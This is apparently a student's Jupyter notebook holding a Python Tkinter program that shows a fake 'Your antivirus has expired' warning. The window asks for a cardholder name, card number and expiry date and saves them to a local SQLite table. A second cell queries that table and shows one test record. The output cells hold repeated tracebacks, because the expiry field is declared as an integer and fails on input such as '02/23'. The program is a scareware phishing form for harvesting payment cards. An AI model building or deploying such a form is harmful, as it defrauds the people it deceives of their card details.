{
 "cells": [
  {
   "cell_type": "code",
   "execution_count": 2,
   "metadata": {},
   "outputs": [
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception in Tkinter callback\n",
      "Traceback (most recent call last):\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2288.0_x64__qbz5n2kfra8p0\\lib\\tkinter\\__init__.py\", line 570, in get\n",
      "    return self._tk.getint(value)\n",
      "_tkinter.TclError: expected integer but got \"02/23\"\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2288.0_x64__qbz5n2kfra8p0\\lib\\tkinter\\__init__.py\", line 1921, in __call__\n",
      "    return self.func(*args)\n",
      "  File \"C:\\Users\\Zachm\\AppData\\Local\\Temp\\ipykernel_1608\\1758695496.py\", line 56, in getInfo\n",
      "    date = date_var.get()\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2288.0_x64__qbz5n2kfra8p0\\lib\\tkinter\\__init__.py\", line 572, in get\n",
      "    return int(self._tk.getdouble(value))\n",
      "_tkinter.TclError: expected floating-point number but got \"02/23\"\n",
      "Exception in Tkinter callback\n",
      "Traceback (most recent call last):\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2288.0_x64__qbz5n2kfra8p0\\lib\\tkinter\\__init__.py\", line 570, in get\n",
      "    return self._tk.getint(value)\n",
      "_tkinter.TclError: expected integer but got \"02/23\"\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2288.0_x64__qbz5n2kfra8p0\\lib\\tkinter\\__init__.py\", line 1921, in __call__\n",
      "    return self.func(*args)\n",
      "  File \"C:\\Users\\Zachm\\AppData\\Local\\Temp\\ipykernel_1608\\1758695496.py\", line 56, in getInfo\n",
      "    date = date_var.get()\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2288.0_x64__qbz5n2kfra8p0\\lib\\tkinter\\__init__.py\", line 572, in get\n",
      "    return int(self._tk.getdouble(value))\n",
      "_tkinter.TclError: expected floating-point number but got \"02/23\"\n",
      "Exception in Tkinter callback\n",
      "Traceback (most recent call last):\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2288.0_x64__qbz5n2kfra8p0\\lib\\tkinter\\__init__.py\", line 570, in get\n",
      "    return self._tk.getint(value)\n",
      "_tkinter.TclError: expected integer but got \"02/23\"\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2288.0_x64__qbz5n2kfra8p0\\lib\\tkinter\\__init__.py\", line 1921, in __call__\n",
      "    return self.func(*args)\n",
      "  File \"C:\\Users\\Zachm\\AppData\\Local\\Temp\\ipykernel_1608\\1758695496.py\", line 56, in getInfo\n",
      "    date = date_var.get()\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2288.0_x64__qbz5n2kfra8p0\\lib\\tkinter\\__init__.py\", line 572, in get\n",
      "    return int(self._tk.getdouble(value))\n",
      "_tkinter.TclError: expected floating-point number but got \"02/23\"\n",
      "Exception in Tkinter callback\n",
      "Traceback (most recent call last):\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2288.0_x64__qbz5n2kfra8p0\\lib\\tkinter\\__init__.py\", line 570, in get\n",
      "    return self._tk.getint(value)\n",
      "_tkinter.TclError: expected integer but got \"02/23\"\n",
      "\n",
      "During handling of the above exception, another exception occurred:\n",
      "\n",
      "Traceback (most recent call last):\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2288.0_x64__qbz5n2kfra8p0\\lib\\tkinter\\__init__.py\", line 1921, in __call__\n",
      "    return self.func(*args)\n",
      "  File \"C:\\Users\\Zachm\\AppData\\Local\\Temp\\ipykernel_1608\\1758695496.py\", line 56, in getInfo\n",
      "    date = date_var.get()\n",
      "  File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2288.0_x64__qbz5n2kfra8p0\\lib\\tkinter\\__init__.py\", line 572, in get\n",
      "    return int(self._tk.getdouble(value))\n",
      "_tkinter.TclError: expected floating-point number but got \"02/23\"\n"
     ]
    }
   ],
   "source": [
    "import tkinter as tk\n",
    "from tkinter import ttk\n",
    "import sqlite3\n",
    "import pandas as pd\n",
    "\n",
    "\n",
    "\n",
    "sql_connect = sqlite3.connect('database.db')\n",
    "cur = sql_connect.cursor() # creates a cursor object \n",
    "\n",
    "cur.execute('''CREATE TABLE IF NOT EXISTS app_data_credit_info (\n",
    "name STRING,\n",
    "number STRING,\n",
    "date INT\n",
    ")\n",
    "''')\n",
    "sql_connect.commit()\n",
    "\n",
    "\n",
    "\n",
    "main = tk.Tk() \n",
    "label=tk.Label(text=\"Your antivirus has expird. Enter payment information to update .\")\n",
    "\n",
    "name_label = tk.Label(main, text=\"Name on Card\", #shows text asking name on card\n",
    "     font=('calibre',14,'normal'))\n",
    "\n",
    "number_var = tk.StringVar() #Credit card number\n",
    "date_var = tk.IntVar() #credit card date\n",
    "name_var = tk.StringVar() # name on card\n",
    "\n",
    "name_entry = tk.Entry(main, #entry for name\n",
    "    textvariable = name_var,\n",
    "    font=('calibre',14,'normal'))  \n",
    "\n",
    "\n",
    "credit_label = tk.Label(main, text=\"Credit Card Number\", #shows text asking for credit card number\n",
    "                 font=('helvetica',14,'bold'))\n",
    "\n",
    "credit_number = tk.Entry(main, # input for number\n",
    "    textvariable = number_var,\n",
    "    font=('calibre',14,'normal'))                    \n",
    "\n",
    "\n",
    "credit_date_label = tk.Label(main, text=\"Expiration Date\",#shows text asking for expiration date\n",
    "                 font=('helvetica',14,'bold'))\n",
    "\n",
    "credit_date = tk.Entry(main,  # date entry\n",
    "        textvariable = date_var,\n",
    "        font=('calibre',14,'normal'))   \n",
    "\n",
    "\n",
    "def getInfo():\n",
    "    #Gets the name number and date  data\n",
    "    name = name_var.get()\n",
    "    number = number_var.get()\n",
    "    date = date_var.get()\n",
    "    \n",
    "    \n",
    "    #Saves your data to your database\n",
    "    cur.execute(\"INSERT INTO app_data_credit_info (name,number,date) VALUES (?,?,?)\",\n",
    "                (name,number,date))\n",
    "    sql_connect.commit()\n",
    "\n",
    "    name_var.set(\"\")\n",
    "    number_var.set(\"\")\n",
    "    date_var.set(\"\")\n",
    "    main.destroy()\n",
    "\n",
    "\n",
    "\n",
    "\n",
    "\n",
    "button = tk.Button(main, text=\"Please press when done updating payment information\", \n",
    "    command = getInfo)\n",
    " #this function closes the windows after pressing the button\n",
    "\n",
    "\n",
    "label.pack()\n",
    "name_label.pack()\n",
    "name_entry.pack()\n",
    "credit_label.pack()\n",
    "credit_number.pack()\n",
    "credit_date_label.pack()\n",
    "credit_date.pack()\n",
    "button.pack()\n",
    "main.mainloop()\n",
    "\n",
    "\n",
    "\n",
    "\n"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 3,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/html": [
       "<div>\n",
       "<style scoped>\n",
       "    .dataframe tbody tr th:only-of-type {\n",
       "        vertical-align: middle;\n",
       "    }\n",
       "\n",
       "    .dataframe tbody tr th {\n",
       "        vertical-align: top;\n",
       "    }\n",
       "\n",
       "    .dataframe thead th {\n",
       "        text-align: right;\n",
       "    }\n",
       "</style>\n",
       "<table border=\"1\" class=\"dataframe\">\n",
       "  <thead>\n",
       "    <tr style=\"text-align: right;\">\n",
       "      <th></th>\n",
       "      <th>name</th>\n",
       "      <th>number</th>\n",
       "      <th>date</th>\n",
       "    </tr>\n",
       "  </thead>\n",
       "  <tbody>\n",
       "    <tr>\n",
       "      <th>0</th>\n",
       "      <td>Zachary Moon</td>\n",
       "      <td>123456789</td>\n",
       "      <td>147</td>\n",
       "    </tr>\n",
       "  </tbody>\n",
       "</table>\n",
       "</div>"
      ],
      "text/plain": [
       "           name     number  date\n",
       "0  Zachary Moon  123456789   147"
      ]
     },
     "execution_count": 3,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "pd.read_sql_query('''\n",
    "    SELECT * FROM app_data_credit_info;\n",
    "    ''', sql_connect)\n",
    "#this query shows that the getInfo works and saves the input into the database "
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": "Python 3.10.8 64-bit (microsoft store)",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.10.8"
  },
  "orig_nbformat": 4,
  "vscode": {
   "interpreter": {
    "hash": "5e911d79d2cec7f98644307026d4b47c449406b1f538867e4129f4dbeb84410e"
   }
  }
 },
 "nbformat": 4,
 "nbformat_minor": 2
}
